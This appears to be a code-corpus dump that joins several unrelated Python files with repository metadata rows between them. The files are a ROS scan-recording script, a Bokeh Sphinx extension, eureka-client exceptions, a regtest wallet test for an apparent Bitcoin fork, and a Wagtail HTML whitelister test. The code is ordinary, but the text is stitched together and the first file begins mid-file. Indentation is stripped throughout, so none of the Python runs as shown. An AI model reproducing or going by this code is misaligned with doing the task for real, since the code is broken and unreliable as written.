from std_msgs.msg import Float32MultiArray
import matplotlib.pyplot as plt
import tf
import time
RunningOdroid = False
numReadings = 100
lastScan = [0]*numReadings
def scan_cb( msg ):
global lastScan
""" Process the scan that comes back from the scanner """
# NOTE: Scan progresses from least theta to most theta: CCW
# print "Got a scanner message with" , len( msg.intensities ) , "readings!"
# ~ print "Scan:" , self.lastScan
# print "Scan Min:" , min( self.lastScan ) , ", Scan Max:" , max( self.lastScan )
if RunningOdroid:
lastScan = msg.data #lastScan = [ elem/25.50 for elem in msg.data ] # scale [0,255] to [0,10]
else:
lastScan = msg.intensities
rospy.init_node( 'pose_sherlock' , anonymous = True )
if RunningOdroid:
rospy.Subscriber( "/filtered_distance" , Float32MultiArray , scan_cb )
else:
rospy.Subscriber( "/scan" , LaserScan , scan_cb )
listener = tf.TransformListener()
try:
ex_count = 0
last = time.time()
while ( not rospy.is_shutdown() ):
try:
lastScanNP = np.asarray( lastScan ) # scan data
(trans,rot) = listener.lookupTransform('map', 'base_link', rospy.Time(0)) # pose
x = trans[0]
y = trans[1]
if x >= 0.25: # only record in upper section of the U
if time.time()-last > 0.1:
last = time.time()
roll,pitch,yaw = tf.transformations.euler_from_quaternion(rot)
if yaw < 0: yaw = -yaw
else: yaw = 2*np.pi - yaw
yaw += np.pi/2 # basically prevent roll over problems on this map
yaw = np.mod(yaw,2*np.pi)
ex_count += 1
# print(ex_count, ' x:',x,' y:',y,' yaw:',yaw,' scan mean:',lastScanNP.mean())
new_row = np.concatenate((np.asarray([x,y,yaw]),lastScanNP),0)
new_row = np.reshape(new_row,(1,np.shape(new_row)[0]))
try:
mini_dataset = np.concatenate((mini_dataset, new_row),0)
print(np.shape(mini_dataset))
except NameError:
mini_dataset = new_row
if np.shape(mini_dataset)[0] > 150000: break
except (tf.LookupException, tf.ConnectivityException, tf.ExtrapolationException):
continue
np.save('synth_set.npy',mini_dataset)
except KeyboardInterrupt:
pass
| 34.789474 | 102 | 0.576399 |
795b9325f12e6b7d857eca6c5bee2bfb2afae32e | 4,089 | py | Python | bokeh/sphinxext/bokeh_palette_group.py | jeisch/bokeh | 6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1 | [
"BSD-3-Clause"
] | 1 | 2020-03-21T04:11:51.000Z | 2020-03-21T04:11:51.000Z | bokeh/sphinxext/bokeh_palette_group.py | jeisch/bokeh | 6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1 | [
"BSD-3-Clause"
] | 2 | 2021-05-08T11:43:21.000Z | 2021-05-10T19:16:43.000Z | bokeh/sphinxext/bokeh_palette_group.py | jeisch/bokeh | 6be4d5ebbec04117f2bb0693fe64dc664f8f1bb1 | [
"BSD-3-Clause"
] | null | null | null | #-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2019, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
''' Generate visual representations of palettes in Bokeh palette groups.
The ``bokeh.palettes`` modules expose attributes such as ``mpl``, ``brewer``,
and ``d3`` that provide groups of palettes. The ``bokeh-palette-group``
directive accepts the name of one of these groups, and generates a visual
matrix of colors for every palette in the group.
As an example, the following usage of the the directive:
.. code-block:: rest
.. bokeh-palette-group:: mpl
Generates the output:
.. bokeh-palette-group:: mpl
'''
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
# External imports
from docutils import nodes
from docutils.parsers.rst import Directive
from sphinx.errors import SphinxError
# Bokeh imports
from .. import palettes as bp
from .templates import PALETTE_GROUP_DETAIL
#-----------------------------------------------------------------------------
# Globals and constants
#-----------------------------------------------------------------------------
__all__ = (
'bokeh_palette_group',
'BokehPaletteGroupDirective',
'html_visit_bokeh_palette_group',
'setup',
)
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
class bokeh_palette_group(nodes.General, nodes.Element):
pass
class BokehPaletteGroupDirective(Directive):
has_content = False
required_arguments = 1
def run(self):
node = bokeh_palette_group()
node['group'] = self.arguments[0]
return [node]
def html_visit_bokeh_palette_group(self, node):
self.body.append(_BOOTSTRAP_CSS)
self.body.append('<div class="container-fluid"><div class="row">"')
group = getattr(bp, node['group'], None)
if not isinstance(group, dict):
raise SphinxError("invalid palette group name %r" % node['group'])
names = sorted(group)
for name in names:
palettes = group[name]
# arbitrary cuttoff here, idea is to not show large (e.g 256 length) palettes
numbers = [x for x in sorted(palettes) if x < 30]
html = PALETTE_GROUP_DETAIL.render(name=name, numbers=numbers, palettes=palettes)
self.body.append(html)
self.body.append('</div></div>')
self.body.append(_BOOTSTRAP_JS)
raise nodes.SkipNode
def setup(app):
''' Required Sphinx extension setup function. '''
app.add_node(bokeh_palette_group, html=(html_visit_bokeh_palette_group, None))
app.add_directive('bokeh-palette-group', BokehPaletteGroupDirective)
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
_BOOTSTRAP_CSS = """
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
"""
_BOOTSTRAP_JS = """
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
"""
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| 34.361345 | 100 | 0.493275 |
795b93a447dae6b1adf39061a7079ddbbe4548a5 | 703 | py | Python | dss_sm_so/tests/__init__.py | MobileCloudNetworking/dssaas | 87b6f7d60ecc397a88326a955b2ddfd3d73205d1 | [
"Apache-2.0"
] | null | null | null | dss_sm_so/tests/__init__.py | MobileCloudNetworking/dssaas | 87b6f7d60ecc397a88326a955b2ddfd3d73205d1 | [
"Apache-2.0"
] | null | null | null | dss_sm_so/tests/__init__.py | MobileCloudNetworking/dssaas | 87b6f7d60ecc397a88326a955b2ddfd3d73205d1 | [
"Apache-2.0"
] | 1 | 2018-10-09T06:28:36.000Z | 2018-10-09T06:28:36.000Z | # Copyright 2014 Zuercher Hochschule fuer Angewandte Wissenschaften
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unittests
"""
__author__ = 'andy' | 37 | 78 | 0.732575 |
795b943d2d03bb00951f5d7fa1bcfdc0c64ca5c6 | 829 | py | Python | py_eureka_client/exceptions.py | dev-89/python-eureka-client | 9927fc2766d19a79a5f192667c8755fe38e01d2c | [
"MIT"
] | null | null | null | py_eureka_client/exceptions.py | dev-89/python-eureka-client | 9927fc2766d19a79a5f192667c8755fe38e01d2c | [
"MIT"
] | null | null | null | py_eureka_client/exceptions.py | dev-89/python-eureka-client | 9927fc2766d19a79a5f192667c8755fe38e01d2c | [
"MIT"
] | null | null | null | from logging import exception
import py_eureka_client.http_client as http_client
from py_eureka_client import instance
class EurekaServerConnectionException(http_client.URLError):
pass
class DiscoverException(http_client.URLError):
pass
class WrongXMLNodeError(Exception):
"""Custom error that is raised when XML node is of wrong type"""
def __init__(self, node_type: str, message: str) -> None:
self.node_type: str = node_type
self.message: str = message
super().__init__(message)
class InstanceDoesNotExistError(Exception):
"""Custom error if an instance id is queried, which does not exist"""
def __init__(self, instance_id: str, message: str) -> None:
self.instance_id: str = instance_id
self.message: str = message
super().__init__(message)
| 26.741935 | 73 | 0.721351 |
795b95a286215dfb8c37dc5634d5889e732b2f1c | 21,985 | py | Python | qa/rpc-tests/wallet.py | lycion/lkcoinse | 9cf9ed5730217566b44466c22dc255f0134ad1bb | [
"MIT"
] | null | null | null | qa/rpc-tests/wallet.py | lycion/lkcoinse | 9cf9ed5730217566b44466c22dc255f0134ad1bb | [
"MIT"
] | null | null | null | qa/rpc-tests/wallet.py | lycion/lkcoinse | 9cf9ed5730217566b44466c22dc255f0134ad1bb | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# Copyright (c) 2014-2015 The Lkcoinse Core developers
# Copyright (c) 2015-2017 The Lkcoinse Unlimited developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import test_framework.loginit
import time
import sys
if sys.version_info[0] < 3:
raise "Use Python 3"
import logging
from test_framework.test_framework import LkcoinseTestFramework
from test_framework.util import *
import binascii
from test_framework.script import *
from test_framework.nodemessages import *
def GenerateSingleSigP2SH(lcsAddress):
redeemScript = CScript([OP_DUP, OP_HASH160, lkcoinseAddress2bin(lcsAddress), OP_EQUALVERIFY, OP_CHECKSIG])
p2shAddressBin = hash160(redeemScript)
p2shAddress = encodeLkcoinseAddress(bytes([196]), p2shAddressBin) # 196 is regtest P2SH addr prefix
pubkeyScript = CScript([OP_HASH160, p2shAddressBin, OP_EQUAL])
return ( p2shAddress, redeemScript)
def waitForRescan(node):
info = node.getinfo()
while "rescanning" in info["status"]:
logging.info("rescanning")
time.sleep(.25)
info = node.getinfo()
class WalletTest (LkcoinseTestFramework):
def check_fee_amount(self, curr_balance, balance_with_fee, fee_per_byte, tx_size):
"""Return curr_balance after asserting the fee was in range"""
fee = balance_with_fee - curr_balance
target_fee = fee_per_byte * tx_size
if fee < target_fee:
raise AssertionError("Fee of %s LCS too low! (Should be %s LCS)"%(str(fee), str(target_fee)))
# allow the node's estimation to be at most 2 bytes off
if fee > fee_per_byte * (tx_size + 2):
raise AssertionError("Fee of %s LCS too high! (Should be %s LCS)"%(str(fee), str(target_fee)))
return curr_balance
def setup_chain(self,lkcoinseConfDict=None, wallets=None):
logging.info("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 4, lkcoinseConfDict, wallets)
def setup_network(self, split=False):
self.node_args = [['-usehd=0'], ['-usehd=0'], ['-usehd=0']]
self.nodes = start_nodes(3, self.options.tmpdir, self.node_args)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.is_network_split=False
self.sync_all()
def run_test (self):
# Check that there's no UTXO on none of the nodes
assert_equal(len(self.nodes[0].listunspent()), 0)
assert_equal(len(self.nodes[1].listunspent()), 0)
assert_equal(len(self.nodes[2].listunspent()), 0)
logging.info("Mining blocks...")
self.nodes[0].generate(1)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 50)
assert_equal(walletinfo['balance'], 0)
self.sync_all()
self.nodes[1].generate(101)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 50)
assert_equal(self.nodes[1].getbalance(), 50)
assert_equal(self.nodes[2].getbalance(), 0)
# Check that only first and second nodes have UTXOs
assert_equal(len(self.nodes[0].listunspent()), 1)
assert_equal(len(self.nodes[1].listunspent()), 1)
assert_equal(len(self.nodes[2].listunspent()), 0)
# Send 21 LCS from 0 to 2 using sendtoaddress call.
# Second transaction will be child of first, and will require a fee
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 11)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 10)
walletinfo = self.nodes[0].getwalletinfo()
assert_equal(walletinfo['immature_balance'], 0)
# Have node0 mine a block, thus it will collect its own fee.
self.nodes[0].generate(1)
self.sync_all()
# Exercise locking of unspent outputs
unspent_0 = self.nodes[2].listunspent()[0]
unspent_0 = {"txid": unspent_0["txid"], "vout": unspent_0["vout"]}
self.nodes[2].lockunspent(False, [unspent_0])
assert_raises(JSONRPCException, self.nodes[2].sendtoaddress, self.nodes[2].getnewaddress(), 20)
assert_equal([unspent_0], self.nodes[2].listlockunspent())
self.nodes[2].lockunspent(True, [unspent_0])
assert_equal(len(self.nodes[2].listlockunspent()), 0)
# Have node1 generate 100 blocks (so node0 can recover the fee)
self.nodes[1].generate(100)
self.sync_all()
# node0 should end up with 100 lcs in block rewards plus fees, but
# minus the 21 plus fees sent to node2
assert_equal(self.nodes[0].getbalance(), 100-21)
assert_equal(self.nodes[2].getbalance(), 21)
# Node0 should have two unspent outputs.
# Create a couple of transactions to send them to node2, submit them through
# node1, and make sure both node0 and node2 pick them up properly:
node0utxos = self.nodes[0].listunspent(1)
assert_equal(len(node0utxos), 2)
# create both transactions
txns_to_send = []
for utxo in node0utxos:
inputs = []
outputs = {}
inputs.append({ "txid" : utxo["txid"], "vout" : utxo["vout"]})
outputs[self.nodes[2].getnewaddress("from1")] = utxo["amount"]
raw_tx = self.nodes[0].createrawtransaction(inputs, outputs)
txns_to_send.append(self.nodes[0].signrawtransaction(raw_tx))
# Have node 1 (miner) send the transactions
self.nodes[1].sendrawtransaction(txns_to_send[0]["hex"], True)
self.nodes[1].sendrawtransaction(txns_to_send[1]["hex"], True)
# Have node1 mine a block to confirm transactions:
self.nodes[1].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 100)
assert_equal(self.nodes[2].getbalance("from1"), 100-21)
# Send 10 LCS normal
address = self.nodes[0].getnewaddress("test")
fee_per_byte = Decimal('0.001') / 1000
self.nodes[2].settxfee(fee_per_byte * 1000)
txid = self.nodes[2].sendtoaddress(address, 10, "", "", False)
self.nodes[2].generate(1)
self.sync_all()
node_2_bal = self.check_fee_amount(self.nodes[2].getbalance(), Decimal('90'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), Decimal('10'))
# Send 10 LCS with subtract fee from amount
txid = self.nodes[2].sendtoaddress(address, 10, "", "", True)
self.nodes[2].generate(1)
self.sync_all()
node_2_bal -= Decimal('10')
assert_equal(self.nodes[2].getbalance(), node_2_bal)
node_0_bal = self.check_fee_amount(self.nodes[0].getbalance(), Decimal('20'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
# Sendmany 10 LCS
txid = self.nodes[2].sendmany('from1', {address: 10}, 0, "", [])
self.nodes[2].generate(1)
self.sync_all()
node_0_bal += Decimal('10')
node_2_bal = self.check_fee_amount(self.nodes[2].getbalance(), node_2_bal - Decimal('10'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
assert_equal(self.nodes[0].getbalance(), node_0_bal)
# Sendmany 10 LCS with subtract fee from amountd
txid = self.nodes[2].sendmany('from1', {address: 10}, 0, "", [address])
self.nodes[2].generate(1)
self.sync_all()
node_2_bal -= Decimal('10')
assert_equal(self.nodes[2].getbalance(), node_2_bal)
node_0_bal = self.check_fee_amount(self.nodes[0].getbalance(), node_0_bal + Decimal('10'), fee_per_byte, count_bytes(self.nodes[2].getrawtransaction(txid)))
# Test ResendWalletTransactions:
# Create a couple of transactions, then start up a fourth
# node (nodes[3]) and ask nodes[0] to rebroadcast.
# EXPECT: nodes[3] should have those transactions in its mempool.
txid1 = self.nodes[0].sendtoaddress(self.nodes[1].getnewaddress(), 1)
txid2 = self.nodes[1].sendtoaddress(self.nodes[0].getnewaddress(), 1)
sync_mempools(self.nodes)
self.nodes.append(start_node(3, self.options.tmpdir, ['-usehd=0']))
connect_nodes_bi(self.nodes, 0, 3)
sync_blocks(self.nodes)
relayed = self.nodes[0].resendwallettransactions()
assert_equal(set(relayed), {txid1, txid2})
sync_mempools(self.nodes)
assert(txid1 in self.nodes[3].getrawmempool())
# Exercise balance rpcs
assert_equal(self.nodes[0].getwalletinfo()["unconfirmed_balance"], 1)
assert_equal(self.nodes[0].getunconfirmedbalance(), 1)
#check if we can list zero value tx as available coins
#1. create rawtx
#2. hex-changed one output to 0.0
#3. sign and send
#4. check if recipient (node0) can list the zero value tx
usp = self.nodes[1].listunspent()
inputs = [{"txid":usp[0]['txid'], "vout":usp[0]['vout']}]
outputs = {self.nodes[1].getnewaddress(): 49.998, self.nodes[0].getnewaddress(): 11.11}
rawTx = self.nodes[1].createrawtransaction(inputs, outputs).replace("c0833842", "00000000") #replace 11.11 with 0.0 (int32)
decRawTx = self.nodes[1].decoderawtransaction(rawTx)
signedRawTx = self.nodes[1].signrawtransaction(rawTx)
decRawTx = self.nodes[1].decoderawtransaction(signedRawTx['hex'])
zeroValueTxid= decRawTx['txid']
sendResp = self.nodes[1].sendrawtransaction(signedRawTx['hex'])
self.sync_all()
self.nodes[1].generate(1) #mine a block
self.sync_all()
unspentTxs = self.nodes[0].listunspent() #zero value tx must be in listunspents output
found = False
for uTx in unspentTxs:
if uTx['txid'] == zeroValueTxid:
found = True
assert_equal(uTx['amount'], Decimal('0'))
assert_equal(uTx['satoshi'], Decimal('0'))
assert(found)
#do some -walletbroadcast tests
stop_nodes(self.nodes)
wait_lkcoinseds()
self.nodes = start_nodes(3, self.options.tmpdir, [["-walletbroadcast=0", "-usehd=0"],["-walletbroadcast=0", "-usehd=0"],["-walletbroadcast=0", "-usehd=0"]])
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
self.sync_all()
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 2)
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
self.nodes[1].generate(1) #mine a block, tx should not be in there
self.sync_all()
assert_equal(self.nodes[2].getbalance(), node_2_bal) #should not be changed because tx was not broadcasted
#now broadcast from another node, mine a block, sync, and check the balance
self.nodes[1].sendrawtransaction(txObjNotBroadcasted['hex'])
self.nodes[1].generate(1)
self.sync_all()
node_2_bal += 2
txObjNotBroadcasted = self.nodes[0].gettransaction(txIdNotBroadcasted)
assert_equal(self.nodes[2].getbalance(), node_2_bal)
#create another tx
txIdNotBroadcasted = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), 2)
#restart the nodes with -walletbroadcast=1
stop_nodes(self.nodes)
wait_lkcoinseds()
self.node_args = [['-usehd=0'], ['-usehd=0'], ['-usehd=0']]
self.nodes = start_nodes(3, self.options.tmpdir, self.node_args)
connect_nodes_bi(self.nodes,0,1)
connect_nodes_bi(self.nodes,1,2)
connect_nodes_bi(self.nodes,0,2)
sync_blocks(self.nodes)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
node_2_bal += 2
#tx should be added to balance because after restarting the nodes tx should be broadcastet
assert_equal(self.nodes[2].getbalance(), node_2_bal)
#send a tx with value in a string (PR#6380 +)
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "2")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-2'))
assert_equal(txObj['satoshi'], Decimal('-200000000'));
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "0.0001")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-0.0001'))
assert_equal(txObj['satoshi'], Decimal('-10000'))
#check if JSON parser can handle scientific notation in strings
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "1e-4")
txObj = self.nodes[0].gettransaction(txId)
assert_equal(txObj['amount'], Decimal('-0.0001'))
try:
txId = self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(), "1f-4")
except JSONRPCException as e:
assert("Invalid amount" in e.error['message'])
else:
raise AssertionError("Must not parse invalid amounts")
try:
self.nodes[0].generate("2")
raise AssertionError("Must not accept strings as numeric")
except JSONRPCException as e:
assert("not an integer" in e.error['message'])
# Import address and private key to check correct behavior of spendable unspents
# 1. Send some coins to generate new UTXO
address_to_import = self.nodes[2].getnewaddress()
txid = self.nodes[0].sendtoaddress(address_to_import, 1)
self.nodes[0].generate(1)
self.sync_all()
# 2. Import address from node2 to node1
self.nodes[1].importaddress(address_to_import)
# 3. Validate that the imported address is watch-only on node1
assert(self.nodes[1].validateaddress(address_to_import)["iswatchonly"])
# 4. Check that the unspents after import are not spendable
assert_array_result(self.nodes[1].listunspent(),
{"address": address_to_import},
{"spendable": False})
# 5. Import private key of the previously imported address on node1
priv_key = self.nodes[2].dumpprivkey(address_to_import)
self.nodes[1].importprivkey(priv_key)
# 6. Check that the unspents are now spendable on node1
assert_array_result(self.nodes[1].listunspent(),
{"address": address_to_import},
{"spendable": True})
# Mine a block from node0 to an address from node1
cbAddr = self.nodes[1].getnewaddress()
blkHash = self.nodes[0].generatetoaddress(1, cbAddr)[0]
cbTxId = self.nodes[0].getblock(blkHash)['tx'][0]
self.sync_all()
# Check that the txid and balance is found by node1
try:
self.nodes[1].gettransaction(cbTxId)
except JSONRPCException as e:
assert("Invalid or non-wallet transaction id" not in e.error['message'])
sync_blocks(self.nodes)
# test multiple private key import, and watch only address import
bal = self.nodes[2].getbalance()
addrs = [ self.nodes[1].getnewaddress() for i in range(0,21)]
pks = [ self.nodes[1].dumpprivkey(x) for x in addrs]
for a in addrs:
self.nodes[0].sendtoaddress(a, 1)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
self.nodes[2].importprivatekeys(pks[0], pks[1])
waitForRescan(self.nodes[2])
assert(bal + 2 == self.nodes[2].getbalance())
self.nodes[2].importprivatekeys("rescan", pks[2], pks[3])
waitForRescan(self.nodes[2])
assert(bal + 4 == self.nodes[2].getbalance())
self.nodes[2].importprivatekeys("no-rescan", pks[4], pks[5])
time.sleep(1)
assert(bal + 4 == self.nodes[2].getbalance()) # since the recan didn't happen, there won't be a balance change
self.nodes[2].importaddresses("rescan") # force a rescan although we imported nothing
waitForRescan(self.nodes[2])
assert(bal + 6 == self.nodes[2].getbalance())
# import 5 addresses each (bug fix check)
self.nodes[2].importaddresses(addrs[6], addrs[7], addrs[8], addrs[9], addrs[10]) # import watch only addresses
waitForRescan(self.nodes[2])
assert(bal + 6 == self.nodes[2].getbalance()) # since watch only, won't show in balance
assert(bal + 11 == self.nodes[2].getbalance("*",1,True)) # show the full balance
self.nodes[2].importaddresses("rescan", addrs[11], addrs[12], addrs[13], addrs[14], addrs[15]) # import watch only addresses
waitForRescan(self.nodes[2])
assert(bal + 6 == self.nodes[2].getbalance()) # since watch only, won't show in balance
assert(bal + 16 == self.nodes[2].getbalance("*",1,True)) # show the full balance
self.nodes[2].importaddresses("no-rescan", addrs[16], addrs[17], addrs[18], addrs[19], addrs[20]) # import watch only addresses
time.sleep(1)
assert(bal + 6 == self.nodes[2].getbalance()) # since watch only, won't show in balance
assert(bal + 16 == self.nodes[2].getbalance("*",1,True)) # show the full balance, will be same because no rescan
self.nodes[2].importaddresses("rescan") # force a rescan although we imported nothing
waitForRescan(self.nodes[2])
assert(bal + 21 == self.nodes[2].getbalance("*",1,True)) # show the full balance
# verify that none of the importaddress calls added the address with a label (bug fix check)
txns = self.nodes[2].listreceivedbyaddress(0, True, True)
for i in range(6,21):
assert_array_result(txns,
{"address": addrs[i]},
{"label": ""})
# now try P2SH
lcsAddress = self.nodes[1].getnewaddress()
lcsAddress = self.nodes[1].getaddressforms(lcsAddress)["legacy"]
( p2shAddress, redeemScript) = GenerateSingleSigP2SH(lcsAddress)
self.nodes[0].sendtoaddress(p2shAddress,1)
lcsAddress2 = self.nodes[1].getnewaddress()
lcsAddress2 = self.nodes[1].getaddressforms(lcsAddress2)["legacy"]
( p2shAddress2, redeemScript2) = GenerateSingleSigP2SH(lcsAddress2)
self.nodes[0].sendtoaddress(p2shAddress2,1)
self.nodes[0].generate(1)
sync_blocks(self.nodes)
bal1 = self.nodes[2].getbalance('*', 1, True)
self.nodes[2].importaddresses(hexlify(redeemScript).decode("ascii"),hexlify(redeemScript2).decode("ascii"))
waitForRescan(self.nodes[2])
bal2 = self.nodes[2].getbalance('*', 1, True)
assert_equal(bal1 + 2, bal2)
# verify that none of the importaddress calls added the address with a label (bug fix check)
txns = self.nodes[2].listreceivedbyaddress(0, True, True)
assert_array_result(txns,
{"address": self.nodes[2].getaddressforms(p2shAddress)["lkcoinsecash"]},
{"label": ""})
assert_array_result(txns,
{"address": self.nodes[2].getaddressforms(p2shAddress2)["lkcoinsecash"]},
{"label": ""})
#check if wallet or blochchain maintenance changes the balance
self.sync_all()
blocks = self.nodes[0].generate(2)
self.sync_all()
balance_nodes = [self.nodes[i].getbalance() for i in range(3)]
block_count = self.nodes[0].getblockcount()
# Check modes:
# - True: unicode escaped as \u....
# - False: unicode directly as UTF-8
for mode in [True, False]:
self.nodes[0].ensure_ascii = mode
# unicode check: Basic Multilingual Plane, Supplementary Plane respectively
for s in [u'рыба', u'𝅘𝅥𝅯']:
addr = self.nodes[0].getaccountaddress(s)
label = self.nodes[0].getaccount(addr)
assert_equal(label, s)
assert(s in self.nodes[0].listaccounts().keys())
self.nodes[0].ensure_ascii = True # restore to default
# maintenance tests
maintenance = [
'-rescan',
'-reindex',
'-zapwallettxes=1',
'-zapwallettxes=2',
'-salvagewallet',
]
for m in maintenance:
logging.info("check " + m)
stop_nodes(self.nodes)
wait_lkcoinseds()
self.node_args = [['-usehd=0'], ['-usehd=0'], ['-usehd=0']]
self.nodes = start_nodes(3, self.options.tmpdir, self.node_args)
while m == '-reindex' and [block_count] * 3 != [self.nodes[i].getblockcount() for i in range(3)]:
# reindex will leave rpc warm up "early"; Wait for it to finish
time.sleep(0.1)
assert_equal(balance_nodes, [self.nodes[i].getbalance() for i in range(3)])
# Exercise listsinceblock with the last two blocks
coinbase_tx_1 = self.nodes[0].listsinceblock(blocks[0])
assert_equal(coinbase_tx_1["lastblock"], blocks[1])
assert_equal(len(coinbase_tx_1["transactions"]), 1)
assert_equal(coinbase_tx_1["transactions"][0]["blockhash"], blocks[1])
assert_equal(coinbase_tx_1["transactions"][0]["satoshi"], Decimal('2500000000'))
assert_equal(len(self.nodes[0].listsinceblock(blocks[1])["transactions"]), 0)
if __name__ == '__main__':
WalletTest ().main ()
def Test():
t = WalletTest()
lkcoinseConf = {
"debug": ["net", "blk", "thin", "mempool", "req", "bench", "evict"], # "lck"
"blockprioritysize": 2000000 # we don't want any transactions rejected due to insufficient fees...
}
# "--tmpdir=/ramdisk/test", "--srcdir=../../debug/src"
t.main(["--nocleanup", "--noshutdown"], lkcoinseConf, None)
| 45.802083 | 164 | 0.632659 |
795b9637c04ad2e9b60b6859781d50c72311451d | 3,847 | py | Python | wagtail/wagtailcore/tests/test_dbwhitelister.py | lojack/wagtail | eaf61d5550795a3278184261f6f956f603df8d46 | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtailcore/tests/test_dbwhitelister.py | lojack/wagtail | eaf61d5550795a3278184261f6f956f603df8d46 | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtailcore/tests/test_dbwhitelister.py | lojack/wagtail | eaf61d5550795a3278184261f6f956f603df8d46 | [
"BSD-3-Clause"
] | null | null | null | from django.test import TestCase
from wagtail.wagtailcore.rich_text import DbWhitelister
from wagtail.wagtailcore.whitelist import Whitelister
from bs4 import BeautifulSoup
class TestDbWhitelister(TestCase):
def assertHtmlEqual(self, str1, str2):
"""
Assert that two HTML strings are equal at the DOM level
(necessary because we can't guarantee the order that attributes are output in)
"""
self.assertEqual(BeautifulSoup(str1), BeautifulSoup(str2))
def test_page_link_is_rewritten(self):
input_html = '<p>Look at the <a data-linktype="page" data-id="2" href="/">lovely homepage</a> of my <a href="http://wagtail.io/">Wagtail</a> site</p>'
output_html = DbWhitelister.clean(input_html)
expected = '<p>Look at the <a linktype="page" id="2">lovely homepage</a> of my <a href="http://wagtail.io/">Wagtail</a> site</p>'
self.assertHtmlEqual(expected, output_html)
def test_document_link_is_rewritten(self):
input_html = '<p>Look at our <a data-linktype="document" data-id="1" href="/documents/1/brochure.pdf">horribly oversized brochure</a></p>'
output_html = DbWhitelister.clean(input_html)
expected = '<p>Look at our <a linktype="document" id="1">horribly oversized brochure</a></p>'
self.assertHtmlEqual(expected, output_html)
def test_image_embed_is_rewritten(self):
input_html = '<p>OMG look at this picture of a kitten: <figure data-embedtype="image" data-id="5" data-format="image-with-caption" data-alt="A cute kitten" class="fancy-image"><img src="/media/images/kitten.jpg" width="320" height="200" alt="A cute kitten" /><figcaption>A kitten, yesterday.</figcaption></figure></p>'
output_html = DbWhitelister.clean(input_html)
expected = '<p>OMG look at this picture of a kitten: <embed embedtype="image" id="5" format="image-with-caption" alt="A cute kitten" /></p>'
self.assertHtmlEqual(expected, output_html)
def test_media_embed_is_rewritten(self):
input_html = '<p>OMG look at this video of a kitten: <iframe data-embedtype="media" data-url="https://www.youtube.com/watch?v=dQw4w9WgXcQ" width="640" height="480" src="//www.youtube.com/embed/dQw4w9WgXcQ" frameborder="0" allowfullscreen></iframe></p>'
output_html = DbWhitelister.clean(input_html)
expected = '<p>OMG look at this video of a kitten: <embed embedtype="media" url="https://www.youtube.com/watch?v=dQw4w9WgXcQ" /></p>'
self.assertHtmlEqual(expected, output_html)
def test_whitelist_hooks(self):
# wagtail.tests.wagtail_hooks overrides the whitelist to permit <blockquote> and <a target="...">
input_html = '<blockquote>I would put a tax on all people who <a href="https://twitter.com/DMReporter/status/432914941201223680/photo/1" target="_blank" tea="darjeeling">stand in water</a>.</blockquote><p>- <character>Gumby</character></p>'
output_html = DbWhitelister.clean(input_html)
expected = '<blockquote>I would put a tax on all people who <a href="https://twitter.com/DMReporter/status/432914941201223680/photo/1" target="_blank">stand in water</a>.</blockquote><p>- Gumby</p>'
self.assertHtmlEqual(expected, output_html)
# check that the base Whitelister class is unaffected by these custom whitelist rules
input_html = '<blockquote>I would put a tax on all people who <a href="https://twitter.com/DMReporter/status/432914941201223680/photo/1" target="_blank" tea="darjeeling">stand in water</a>.</blockquote><p>- <character>Gumby</character></p>'
